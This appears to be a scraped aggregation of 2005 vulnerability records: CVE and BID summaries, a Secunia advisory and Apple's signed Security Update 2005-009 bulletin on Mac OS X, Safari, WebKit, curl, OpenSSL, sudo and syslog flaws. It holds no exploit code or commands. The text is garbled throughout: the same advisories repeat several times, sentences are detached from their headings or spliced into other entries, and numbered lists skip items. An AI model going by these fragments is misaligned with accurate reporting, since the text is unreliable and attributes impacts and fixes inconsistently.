accessible to other users. This update addresses the issue by rejecting overlong filenames. This could mislead users into unintentionally disclosing information to a web site. This update addresses the issue by displaying the originating site name in JavaScript dialog boxes. Credit to Jakob Balle of Secunia Research for reporting this issue. This may be triggered by content downloaded from malicious web sites in applications that use WebKit such as Safari. This update addresses the issue by removing the heap overflow from WebKit. Credit to Neil Archibald of Suresec LTD and Marco Mella for reporting this issue. Although the default configuration is not vulnerable to this issue, custom sudo configurations may not properly restrict users. Further information on this issue is available from: http://www.sudo.ws/sudo/alerts/path_race.html This update addresses the issue by incorporating sudo version 1.6.8p9. By supplying control characters such as the newline character, a local attacker could forge entries with the intention to mislead the system administrator. This update addresses the issue by specially handling control characters and other non-printable characters. This issue does not affect systems prior to Mac OS X v10.4. Credit to HELIOS Software GmbH for reporting this issue

Unknown vulnerability in iodbcadmintool in the ODBC Administrator utility in Mac OS X and OS X Server 10.3.9 and 10.4.3 allows local users to execute arbitrary code via unknown attack vectors. The 'iodbcadmintool' utility is prone to a local privilege-escalation vulnerability. This issue can allow local attackers to gain elevated privileges on an affected computer. NOTE: This issue was previously discussed in BID 15647 (Apple Mac OS X Security Update 2005-009 Multiple Vulnerabilities), but has been assigned its own record to better document the vulnerability. For more information: SA14530 2) An error in the Apache web server's "mod_ssl" module may be exploited by malicious people to bypass certain security restrictions. For more information: SA16700 3) A boundary error exists in CoreFoundation when resolving certain URL. 4) An error in curl when handling NTLM authentication can be exploited by malicious people to compromise a user's system. For more information: SA17193 5) An error exists in the ODBC Administrator utility helper tool "iodbcadmintoo". 6) An error in OpenSSL when handling certain compatibility options can potentially be exploited by malicious people to perform protocol rollback attacks. 8) An integer overflow error exists in the PCRE library that is used by Safari's JavaScript engine. This can potentially be exploited by malicious people to compromise a user's system. This can be exploited to cause the download file to be saved outside of the designated download directory. For more information: SA15474 11) A boundary error exists in WebKit when handling certain specially crafted content. For more information: SA15744 13) The syslog server does not properly sanitise messages before recording them. SOLUTION: Apply Security Update 2005-009. ORIGINAL ADVISORY: http://docs.info.apple.com/article.html?artnum=302847 OTHER REFERENCES: SA14530: http://secunia.com/advisories/14530/ SA16700: http://secunia.com/advisories/16700/ SA17193: http://secunia.com/advisories/17193/ SA17151: http://secunia.com/advisories/17151/ SA16502: http://secunia.com/advisories/16502/ SA15474: http://secunia.com/advisories/15474/ SA15744: http://secunia.com/advisories/15744/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2005-11-29 Security Update 2005-009 Security Update 2005-009 is now available and delivers the following security enhancements: Apache2 CVE-ID: CVE-2005-2088 Available for: Mac OS X Server v10.3.9, Mac OS X Server v10.4.3 Impact: Cross-site scripting may be possible in certain configurations Description: The Apache 2 web server may allow an attacker to bypass protections using specially-crafted HTTP headers. This behavior is only present when Apache is used in conjunction with certain proxy servers, caching servers, or web application firewalls. This update addresses the issue by incorporating Apache version 2.0.55. Only Apache configurations that include the "SSLVerifyClient require" directive may be affected. This update address the issue by incorporating mod_ssl 2.8.24 and Apache version 2.0.55 (Mac OS X Server). CoreFoundation is used by Safari and other applications. This update addresses the issue by performing additional validation of URLs. This issue does not affect systems prior to Mac OS X v10.4. This may cause a stack buffer overflow and lead to arbitrary code execution. This update addresses the issue by performing additional validation when using NTLM authentication. This issue does not affect systems prior to Mac OS X v10.4. This helper tool contains a vulnerability that may allow local users to execute arbitrary commands with raised privileges. This update addresses the issue by providing an updated iodbcadmintool that is not susceptible. Such attacks may cause an SSL connection to use the SSLv2 protocol which provides less protection than SSLv3 or TLS. Further information on this issue is available at http://www.openssl.org/news/secadv_20051011.txt. This update addresses the issue by incorporating OpenSSL version 0.9.7i. This update addresses the issue by ensuring the credentials are protected. This may lead to the execution of arbitrary code. This update addresses the issue by providing a new version of the JavaScript engine that incorporates more robust input validation. However, if a web site suggests an overlong filename for a download, it is possible for Safari to create this file in other locations. Although the filename and location of the downloaded file content cannot be directly specified by remote servers, this may still lead to downloading content into locations accessible to other users. This update addresses the issue by rejecting overlong filenames. Safari CVE-ID: CVE-2005-3703 Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X v10.4.3, Mac OS X Server v10.4.3 Impact: JavaScript dialog boxes in Safari may be misleading Description: In Safari, JavaScript dialog boxes do not indicate the web site that created them. This could mislead users into unintentionally disclosing information to a web site. This update addresses the issue by displaying the originating site name in JavaScript dialog boxes. Credit to Jakob Balle of Secunia Research for reporting this issue. This may be triggered by content downloaded from malicious web sites in applications that use WebKit such as Safari. This update addresses the issue by removing the heap overflow from WebKit. Credit to Neil Archibald of Suresec LTD and Marco Mella for reporting this issue. Although the default configuration is not vulnerable to this issue, custom sudo configurations may not properly restrict users. Further information on this issue is available from: http://www.sudo.ws/sudo/alerts/path_race.html This update addresses the issue by incorporating sudo version 1.6.8p9. syslog CVE-ID: CVE-2005-3704 Available for: Mac OS X v10.4.3, Mac OS X Server v10.4.3 Impact: System log entries may be forged Description: The system log server records syslog messages verbatim. By supplying control characters such as the newline character, a local attacker could forge entries with the intention to mislead the system administrator. This update addresses the issue by specially handling control characters and other non-printable characters. This issue does not affect systems prior to Mac OS X v10.4. Credit to HELIOS Software GmbH for reporting this issue. Additional Information Also included in this update are enhancements to Safari to improve handling of credit card security codes (Mac OS X v10.3.9 and Mac OS X v10.4.3), CoreTypes to improve handling of Terminal files (Mac OS X v10.4.3), QuickDraw Manager to improve rendering of PICT files (Mac OS X v10.3.9), documentation regarding OpenSSH and PAM (Mac OS X v10.4.3), and ServerMigration to remove unneeded privileges. Security Update 2005-009 may be obtained from the Software Update pane in System Preferences, or Apple's Software Downloads web site: http://www.apple.com/support/downloads/ For Mac OS X v10.4.3 The download file is named: "SecUpd2005-009Ti.dmg" Its SHA-1 digest is: 544f51a7bc73a57dbca95e05693904aadb2f94b1 For Mac OS X Server v10.4.3 The download file is named: "SecUpdSrvr2005-009Ti.dmg" Its SHA-1 digest is: b7620426151b8f1073c9ff73b2adf43b3086cc60 For Mac OS X v10.3.9 The download file is named: "SecUpd2005-009Pan.dmg" Its SHA-1 digest is: ea17ad7852b3e6277f53c2863e51695ac7018650 For Mac OS X Server v10.3.9 The download file is named: "SecUpdSrvr2005-009Pan.dmg" Its SHA-1 digest is: b03711729697ea8e6b683eb983343f2f3de3af13 Information will also be posted to the Apple Product Security web site: http://docs.info.apple.com/article.html?artnum=61798 This message is signed with Apple's Product Security PGP key, and details are available at: http://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.0.1 (Build 2185) iQEVAwUBQ4zotIHaV5ucd/HdAQJiPAf/S7bsLZk3R7I8FBidCKQ/bxSxjhTFx8sK vqsVFNDsXzv+tEa3IP58D8lI8lF94o+50p59qaPWxHzl4HxPVKlH4YCiBesYmVRp FcGo0qbzj5wJzdWADPV+I8O+/CR5k8J35PuKDIzPabnO67nxoXc/DF6go50e5Hr9 Yqs2477ufq0ANd8wG9dF5pfcYwD8KRLfOmfJ9ZVhbG8Up0uO4JH71cTQZIFcKkYf g6N9SCnqx5JqCwsRx85a8WuY1x97K3zqP53/bt4Wzi76VaaSaYj01nVywworTik4 YzOWOckJmWU9+66iby9mKY2mzz+u/vwtiMp577yT4y9FiSg6yp7mWQ== =jnz9 -----END PGP SIGNATURE-----

System log server in Mac OS X and OS X Server 10.4 through 10.4.3 allows remote attackers to spoof syslog messages in log files by injecting various control characters such as newline (NL). Apple has released Security Update 2005-008 to address multiple Mac OS X local and remote vulnerabilities. NOTE: This BID is being retired because the issues are now documented in the following individual records: 16882 Apple Mac OS X CoreFoundation Remote Buffer Overflow Vulnerability 16903 Apple Mac OS X Iodbcadmintool Local Privilege Escalation Vulnerability 16904 Apple Mac OS X Passwordserver Local Privilege Escalation Vulnerability 16926 Apple Safari Remote Directory Traversal Vulnerability 29011 Apple Safari WebKit Unspecified Heap Overflow Vulnerability 14106 Apache HTTP Request Smuggling Vulnerability 14721 Apache Mod_SSL SSLVerifyClient Restriction Bypass Vulnerability 15102 Multiple Vendor WGet/Curl NTLM Username Buffer Overflow Vulnerability 15071 OpenSSL Insecure Protocol Negotiation Weakness 14620 PCRE Regular Expression Heap Overflow Vulnerability 14011 Apple Safari Dialog Box Origin Spoofing Vulnerability 13993 Todd Miller Sudo Local Race Condition Vulnerability. For more information: SA14530 2) An error in the Apache web server's "mod_ssl" module may be exploited by malicious people to bypass certain security restrictions. For more information: SA16700 3) A boundary error exists in CoreFoundation when resolving certain URL. 4) An error in curl when handling NTLM authentication can be exploited by malicious people to compromise a user's system. For more information: SA17193 5) An error exists in the ODBC Administrator utility helper tool "iodbcadmintoo". 6) An error in OpenSSL when handling certain compatibility options can potentially be exploited by malicious people to perform protocol rollback attacks. 8) An integer overflow error exists in the PCRE library that is used by Safari's JavaScript engine. This can potentially be exploited by malicious people to compromise a user's system. This can be exploited to cause the download file to be saved outside of the designated download directory. For more information: SA15474 11) A boundary error exists in WebKit when handling certain specially crafted content. For more information: SA15744 13) The syslog server does not properly sanitise messages before recording them. SOLUTION: Apply Security Update 2005-009. ORIGINAL ADVISORY: http://docs.info.apple.com/article.html?artnum=302847 OTHER REFERENCES: SA14530: http://secunia.com/advisories/14530/ SA16700: http://secunia.com/advisories/16700/ SA17193: http://secunia.com/advisories/17193/ SA17151: http://secunia.com/advisories/17151/ SA16502: http://secunia.com/advisories/16502/ SA15474: http://secunia.com/advisories/15474/ SA15744: http://secunia.com/advisories/15744/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2005-11-29 Security Update 2005-009 Security Update 2005-009 is now available and delivers the following security enhancements: Apache2 CVE-ID: CVE-2005-2088 Available for: Mac OS X Server v10.3.9, Mac OS X Server v10.4.3 Impact: Cross-site scripting may be possible in certain configurations Description: The Apache 2 web server may allow an attacker to bypass protections using specially-crafted HTTP headers. This behavior is only present when Apache is used in conjunction with certain proxy servers, caching servers, or web application firewalls. This update addresses the issue by incorporating Apache version 2.0.55. Only Apache configurations that include the "SSLVerifyClient require" directive may be affected. CoreFoundation CVE-ID: CVE-2005-2757 Available for: Mac OS X v10.4.3, Mac OS X Server v10.4.3 Impact: Resolving a maliciously-crafted URL may result in crashes or arbitrary code execution Description: By carefully crafting a URL, an attacker can trigger a heap buffer overflow in CoreFoundation which may result in a crash or arbitrary code execution. CoreFoundation is used by Safari and other applications. This update addresses the issue by performing additional validation of URLs. This issue does not affect systems prior to Mac OS X v10.4. curl CVE-ID: CVE-2005-3185 Available for: Mac OS X v10.4.3, Mac OS X Server v10.4.3 Impact: Visiting a malicious HTTP server and using NTLM authentication may result in arbitrary code execution Description: Using curl with NTLM authentication enabled to download an HTTP resource may allow an attacker to supply an overlong user or domain name. This may cause a stack buffer overflow and lead to arbitrary code execution. This update addresses the issue by performing additional validation when using NTLM authentication. This issue does not affect systems prior to Mac OS X v10.4. iodbcadmintool CVE-ID: CVE-2005-3700 Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X v10.4.3, Mac OS X Server v10.4.3 Impact: Local users may gain elevated privileges Description: The ODBC Administrator utility includes a helper tool called iodbcadmintool that executes with raised privileges. This helper tool contains a vulnerability that may allow local users to execute arbitrary commands with raised privileges. This update addresses the issue by providing an updated iodbcadmintool that is not susceptible. Such attacks may cause an SSL connection to use the SSLv2 protocol which provides less protection than SSLv3 or TLS. Further information on this issue is available at http://www.openssl.org/news/secadv_20051011.txt. This update addresses the issue by incorporating OpenSSL version 0.9.7i. passwordserver CVE-ID: CVE-2005-3701 Available for: Mac OS X Server v10.3.9, Mac OS X Server v10.4.3 Impact: Local users on Open Directory master servers may gain elevated privileges Description: When creating an Open Directory master server, credentials may be compromised. This could lead to unprivileged local users gaining elevated privileges on the server. This update addresses the issue by ensuring the credentials are protected. Safari CVE-ID: CVE-2005-2491 Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X v10.4.3, Mac OS X Server v10.4.3 Impact: Processing a regular expressions may result in arbitrary code execution Description: The JavaScript engine in Safari uses a version of the PCRE library that is vulnerable to a potentially exploitable heap overflow. This may lead to the execution of arbitrary code. This update addresses the issue by providing a new version of the JavaScript engine that incorporates more robust input validation. However, if a web site suggests an overlong filename for a download, it is possible for Safari to create this file in other locations. Although the filename and location of the downloaded file content cannot be directly specified by remote servers, this may still lead to downloading content into locations accessible to other users. This update addresses the issue by rejecting overlong filenames. Safari CVE-ID: CVE-2005-3703 Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X v10.4.3, Mac OS X Server v10.4.3 Impact: JavaScript dialog boxes in Safari may be misleading Description: In Safari, JavaScript dialog boxes do not indicate the web site that created them. This could mislead users into unintentionally disclosing information to a web site. This update addresses the issue by displaying the originating site name in JavaScript dialog boxes. Credit to Jakob Balle of Secunia Research for reporting this issue. Safari CVE-ID: CVE-2005-3705 Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X v10.4.3, Mac OS X Server v10.4.3 Impact: Visiting malicious web sites with WebKit-based applications may lead to arbitrary code execution Description: WebKit contains a heap overflow that may lead to the execution of arbitrary code. This may be triggered by content downloaded from malicious web sites in applications that use WebKit such as Safari. This update addresses the issue by removing the heap overflow from WebKit. Credit to Neil Archibald of Suresec LTD and Marco Mella for reporting this issue. Although the default configuration is not vulnerable to this issue, custom sudo configurations may not properly restrict users. Further information on this issue is available from: http://www.sudo.ws/sudo/alerts/path_race.html This update addresses the issue by incorporating sudo version 1.6.8p9. By supplying control characters such as the newline character, a local attacker could forge entries with the intention to mislead the system administrator. This update addresses the issue by specially handling control characters and other non-printable characters. This issue does not affect systems prior to Mac OS X v10.4. Credit to HELIOS Software GmbH for reporting this issue. Additional Information Also included in this update are enhancements to Safari to improve handling of credit card security codes (Mac OS X v10.3.9 and Mac OS X v10.4.3), CoreTypes to improve handling of Terminal files (Mac OS X v10.4.3), QuickDraw Manager to improve rendering of PICT files (Mac OS X v10.3.9), documentation regarding OpenSSH and PAM (Mac OS X v10.4.3), and ServerMigration to remove unneeded privileges. Security Update 2005-009 may be obtained from the Software Update pane in System Preferences, or Apple's Software Downloads web site: http://www.apple.com/support/downloads/ For Mac OS X v10.4.3 The download file is named: "SecUpd2005-009Ti.dmg" Its SHA-1 digest is: 544f51a7bc73a57dbca95e05693904aadb2f94b1 For Mac OS X Server v10.4.3 The download file is named: "SecUpdSrvr2005-009Ti.dmg" Its SHA-1 digest is: b7620426151b8f1073c9ff73b2adf43b3086cc60 For Mac OS X v10.3.9 The download file is named: "SecUpd2005-009Pan.dmg" Its SHA-1 digest is: ea17ad7852b3e6277f53c2863e51695ac7018650 For Mac OS X Server v10.3.9 The download file is named: "SecUpdSrvr2005-009Pan.dmg" Its SHA-1 digest is: b03711729697ea8e6b683eb983343f2f3de3af13 Information will also be posted to the Apple Product Security web site: http://docs.info.apple.com/article.html?artnum=61798 This message is signed with Apple's Product Security PGP key, and details are available at: http://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.0.1 (Build 2185) iQEVAwUBQ4zotIHaV5ucd/HdAQJiPAf/S7bsLZk3R7I8FBidCKQ/bxSxjhTFx8sK vqsVFNDsXzv+tEa3IP58D8lI8lF94o+50p59qaPWxHzl4HxPVKlH4YCiBesYmVRp FcGo0qbzj5wJzdWADPV+I8O+/CR5k8J35PuKDIzPabnO67nxoXc/DF6go50e5Hr9 Yqs2477ufq0ANd8wG9dF5pfcYwD8KRLfOmfJ9ZVhbG8Up0uO4JH71cTQZIFcKkYf g6N9SCnqx5JqCwsRx85a8WuY1x97K3zqP53/bt4Wzi76VaaSaYj01nVywworTik4 YzOWOckJmWU9+66iby9mKY2mzz+u/vwtiMp577yT4y9FiSg6yp7mWQ== =jnz9 -----END PGP SIGNATURE-----

Heap-based buffer overflow in WebKit in Mac OS X and OS X Server 10.3.9 and 10.4.3, as used in applications such as Safari, allows remote attackers to execute arbitrary code via unknown attack vectors. Apple Safari is prone to a heap-overflow vulnerability. Attackers may exploit this issue to execute arbitrary code or to crash the affected application. Other attacks are also possible. For more information: SA14530 2) An error in the Apache web server's "mod_ssl" module may be exploited by malicious people to bypass certain security restrictions. For more information: SA16700 3) A boundary error exists in CoreFoundation when resolving certain URL. 4) An error in curl when handling NTLM authentication can be exploited by malicious people to compromise a user's system. For more information: SA17193 5) An error exists in the ODBC Administrator utility helper tool "iodbcadmintoo". 6) An error in OpenSSL when handling certain compatibility options can potentially be exploited by malicious people to perform protocol rollback attacks. 8) An integer overflow error exists in the PCRE library that is used by Safari's JavaScript engine. This can potentially be exploited by malicious people to compromise a user's system. This can be exploited to cause the download file to be saved outside of the designated download directory. For more information: SA15474 11) A boundary error exists in WebKit when handling certain specially crafted content. For more information: SA15744 13) The syslog server does not properly sanitise messages before recording them. SOLUTION: Apply Security Update 2005-009. ORIGINAL ADVISORY: http://docs.info.apple.com/article.html?artnum=302847 OTHER REFERENCES: SA14530: http://secunia.com/advisories/14530/ SA16700: http://secunia.com/advisories/16700/ SA17193: http://secunia.com/advisories/17193/ SA17151: http://secunia.com/advisories/17151/ SA16502: http://secunia.com/advisories/16502/ SA15474: http://secunia.com/advisories/15474/ SA15744: http://secunia.com/advisories/15744/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2005-11-29 Security Update 2005-009 Security Update 2005-009 is now available and delivers the following security enhancements: Apache2 CVE-ID: CVE-2005-2088 Available for: Mac OS X Server v10.3.9, Mac OS X Server v10.4.3 Impact: Cross-site scripting may be possible in certain configurations Description: The Apache 2 web server may allow an attacker to bypass protections using specially-crafted HTTP headers. This behavior is only present when Apache is used in conjunction with certain proxy servers, caching servers, or web application firewalls. This update addresses the issue by incorporating Apache version 2.0.55. Only Apache configurations that include the "SSLVerifyClient require" directive may be affected. CoreFoundation is used by Safari and other applications. This update addresses the issue by performing additional validation of URLs. This may cause a stack buffer overflow and lead to arbitrary code execution. This update addresses the issue by performing additional validation when using NTLM authentication. This helper tool contains a vulnerability that may allow local users to execute arbitrary commands with raised privileges. This update addresses the issue by providing an updated iodbcadmintool that is not susceptible. Such attacks may cause an SSL connection to use the SSLv2 protocol which provides less protection than SSLv3 or TLS. Further information on this issue is available at http://www.openssl.org/news/secadv_20051011.txt. This update addresses the issue by incorporating OpenSSL version 0.9.7i. passwordserver CVE-ID: CVE-2005-3701 Available for: Mac OS X Server v10.3.9, Mac OS X Server v10.4.3 Impact: Local users on Open Directory master servers may gain elevated privileges Description: When creating an Open Directory master server, credentials may be compromised. This could lead to unprivileged local users gaining elevated privileges on the server. This update addresses the issue by ensuring the credentials are protected. This may lead to the execution of arbitrary code. This update addresses the issue by providing a new version of the JavaScript engine that incorporates more robust input validation. However, if a web site suggests an overlong filename for a download, it is possible for Safari to create this file in other locations. Although the filename and location of the downloaded file content cannot be directly specified by remote servers, this may still lead to downloading content into locations accessible to other users. This update addresses the issue by rejecting overlong filenames. This could mislead users into unintentionally disclosing information to a web site. This update addresses the issue by displaying the originating site name in JavaScript dialog boxes. Credit to Jakob Balle of Secunia Research for reporting this issue. This may be triggered by content downloaded from malicious web sites in applications that use WebKit such as Safari. This update addresses the issue by removing the heap overflow from WebKit. Credit to Neil Archibald of Suresec LTD and Marco Mella for reporting this issue. Although the default configuration is not vulnerable to this issue, custom sudo configurations may not properly restrict users. Further information on this issue is available from: http://www.sudo.ws/sudo/alerts/path_race.html This update addresses the issue by incorporating sudo version 1.6.8p9. By supplying control characters such as the newline character, a local attacker could forge entries with the intention to mislead the system administrator. This update addresses the issue by specially handling control characters and other non-printable characters. Credit to HELIOS Software GmbH for reporting this issue. Security Update 2005-009 may be obtained from the Software Update pane in System Preferences, or Apple's Software Downloads web site: http://www.apple.com/support/downloads/ For Mac OS X v10.4.3 The download file is named: "SecUpd2005-009Ti.dmg" Its SHA-1 digest is: 544f51a7bc73a57dbca95e05693904aadb2f94b1 For Mac OS X Server v10.4.3 The download file is named: "SecUpdSrvr2005-009Ti.dmg" Its SHA-1 digest is: b7620426151b8f1073c9ff73b2adf43b3086cc60 For Mac OS X v10.3.9 The download file is named: "SecUpd2005-009Pan.dmg" Its SHA-1 digest is: ea17ad7852b3e6277f53c2863e51695ac7018650 For Mac OS X Server v10.3.9 The download file is named: "SecUpdSrvr2005-009Pan.dmg" Its SHA-1 digest is: b03711729697ea8e6b683eb983343f2f3de3af13 Information will also be posted to the Apple Product Security web site: http://docs.info.apple.com/article.html?artnum=61798 This message is signed with Apple's Product Security PGP key, and details are available at: http://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.0.1 (Build 2185) iQEVAwUBQ4zotIHaV5ucd/HdAQJiPAf/S7bsLZk3R7I8FBidCKQ/bxSxjhTFx8sK vqsVFNDsXzv+tEa3IP58D8lI8lF94o+50p59qaPWxHzl4HxPVKlH4YCiBesYmVRp FcGo0qbzj5wJzdWADPV+I8O+/CR5k8J35PuKDIzPabnO67nxoXc/DF6go50e5Hr9 Yqs2477ufq0ANd8wG9dF5pfcYwD8KRLfOmfJ9ZVhbG8Up0uO4JH71cTQZIFcKkYf g6N9SCnqx5JqCwsRx85a8WuY1x97K3zqP53/bt4Wzi76VaaSaYj01nVywworTik4 YzOWOckJmWU9+66iby9mKY2mzz+u/vwtiMp577yT4y9FiSg6yp7mWQ== =jnz9 -----END PGP SIGNATURE-----

Unspecified vulnerability in passwordserver in Mac OS X Server 10.3.9 and 10.4.3, when creating an Open Directory master server, allows local users to gain privileges via unknown attack vectors. The 'passwordserver' tool is prone to a local privilege-escalation vulnerability. NOTE: This issue was previously discussed in BID 15647 (Apple Mac OS X Security Update 2005-009 Multiple Vulnerabilities), but has been assigned its own record to better document the vulnerability. For more information: SA14530 2) An error in the Apache web server's "mod_ssl" module may be exploited by malicious people to bypass certain security restrictions. For more information: SA16700 3) A boundary error exists in CoreFoundation when resolving certain URL. 4) An error in curl when handling NTLM authentication can be exploited by malicious people to compromise a user's system. For more information: SA17193 5) An error exists in the ODBC Administrator utility helper tool "iodbcadmintoo". 6) An error in OpenSSL when handling certain compatibility options can potentially be exploited by malicious people to perform protocol rollback attacks. 8) An integer overflow error exists in the PCRE library that is used by Safari's JavaScript engine. This can potentially be exploited by malicious people to compromise a user's system. This can be exploited to cause the download file to be saved outside of the designated download directory. For more information: SA15474 11) A boundary error exists in WebKit when handling certain specially crafted content. For more information: SA15744 13) The syslog server does not properly sanitise messages before recording them. SOLUTION: Apply Security Update 2005-009. ORIGINAL ADVISORY: http://docs.info.apple.com/article.html?artnum=302847 OTHER REFERENCES: SA14530: http://secunia.com/advisories/14530/ SA16700: http://secunia.com/advisories/16700/ SA17193: http://secunia.com/advisories/17193/ SA17151: http://secunia.com/advisories/17151/ SA16502: http://secunia.com/advisories/16502/ SA15474: http://secunia.com/advisories/15474/ SA15744: http://secunia.com/advisories/15744/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2005-11-29 Security Update 2005-009 Security Update 2005-009 is now available and delivers the following security enhancements: Apache2 CVE-ID: CVE-2005-2088 Available for: Mac OS X Server v10.3.9, Mac OS X Server v10.4.3 Impact: Cross-site scripting may be possible in certain configurations Description: The Apache 2 web server may allow an attacker to bypass protections using specially-crafted HTTP headers. This behavior is only present when Apache is used in conjunction with certain proxy servers, caching servers, or web application firewalls. This update addresses the issue by incorporating Apache version 2.0.55. apache_mod_ssl CVE-ID: CVE-2005-2700 Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X v10.4.3, Mac OS X Server v10.4.3 Impact: SSL client authentication may be bypassed in certain configurations Description: The Apache web server's mod_ssl module may allow an attacker unauthorized access to a resource that is configured to require SSL client authentication. Only Apache configurations that include the "SSLVerifyClient require" directive may be affected. This update address the issue by incorporating mod_ssl 2.8.24 and Apache version 2.0.55 (Mac OS X Server). CoreFoundation CVE-ID: CVE-2005-2757 Available for: Mac OS X v10.4.3, Mac OS X Server v10.4.3 Impact: Resolving a maliciously-crafted URL may result in crashes or arbitrary code execution Description: By carefully crafting a URL, an attacker can trigger a heap buffer overflow in CoreFoundation which may result in a crash or arbitrary code execution. CoreFoundation is used by Safari and other applications. This update addresses the issue by performing additional validation of URLs. This issue does not affect systems prior to Mac OS X v10.4. curl CVE-ID: CVE-2005-3185 Available for: Mac OS X v10.4.3, Mac OS X Server v10.4.3 Impact: Visiting a malicious HTTP server and using NTLM authentication may result in arbitrary code execution Description: Using curl with NTLM authentication enabled to download an HTTP resource may allow an attacker to supply an overlong user or domain name. This may cause a stack buffer overflow and lead to arbitrary code execution. This update addresses the issue by performing additional validation when using NTLM authentication. This issue does not affect systems prior to Mac OS X v10.4. This helper tool contains a vulnerability that may allow local users to execute arbitrary commands with raised privileges. This update addresses the issue by providing an updated iodbcadmintool that is not susceptible. OpenSSL CVE-ID: CVE-2005-2969 Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X v10.4.3, Mac OS X Server v10.4.3 Impact: Applications using OpenSSL may be forced to use the weaker SSLv2 protocol Description: Applications that do not disable SSLv2 or that enable certain compatibility options when using OpenSSL may be vulnerable to a protocol downgrade attack. Such attacks may cause an SSL connection to use the SSLv2 protocol which provides less protection than SSLv3 or TLS. Further information on this issue is available at http://www.openssl.org/news/secadv_20051011.txt. This update addresses the issue by incorporating OpenSSL version 0.9.7i. This update addresses the issue by ensuring the credentials are protected. Safari CVE-ID: CVE-2005-2491 Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X v10.4.3, Mac OS X Server v10.4.3 Impact: Processing a regular expressions may result in arbitrary code execution Description: The JavaScript engine in Safari uses a version of the PCRE library that is vulnerable to a potentially exploitable heap overflow. This may lead to the execution of arbitrary code. This update addresses the issue by providing a new version of the JavaScript engine that incorporates more robust input validation. Safari CVE-ID: CVE-2005-3702 Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X v10.4.3, Mac OS X Server v10.4.3 Impact: Safari may download files outside of the designated download directory Description: When files are downloaded in Safari they are normally placed in the location specified as the download directory. However, if a web site suggests an overlong filename for a download, it is possible for Safari to create this file in other locations. Although the filename and location of the downloaded file content cannot be directly specified by remote servers, this may still lead to downloading content into locations accessible to other users. This update addresses the issue by rejecting overlong filenames. Safari CVE-ID: CVE-2005-3703 Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X v10.4.3, Mac OS X Server v10.4.3 Impact: JavaScript dialog boxes in Safari may be misleading Description: In Safari, JavaScript dialog boxes do not indicate the web site that created them. This could mislead users into unintentionally disclosing information to a web site. This update addresses the issue by displaying the originating site name in JavaScript dialog boxes. Credit to Jakob Balle of Secunia Research for reporting this issue. Safari CVE-ID: CVE-2005-3705 Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X v10.4.3, Mac OS X Server v10.4.3 Impact: Visiting malicious web sites with WebKit-based applications may lead to arbitrary code execution Description: WebKit contains a heap overflow that may lead to the execution of arbitrary code. This may be triggered by content downloaded from malicious web sites in applications that use WebKit such as Safari. This update addresses the issue by removing the heap overflow from WebKit. Credit to Neil Archibald of Suresec LTD and Marco Mella for reporting this issue. Although the default configuration is not vulnerable to this issue, custom sudo configurations may not properly restrict users. Further information on this issue is available from: http://www.sudo.ws/sudo/alerts/path_race.html This update addresses the issue by incorporating sudo version 1.6.8p9. syslog CVE-ID: CVE-2005-3704 Available for: Mac OS X v10.4.3, Mac OS X Server v10.4.3 Impact: System log entries may be forged Description: The system log server records syslog messages verbatim. By supplying control characters such as the newline character, 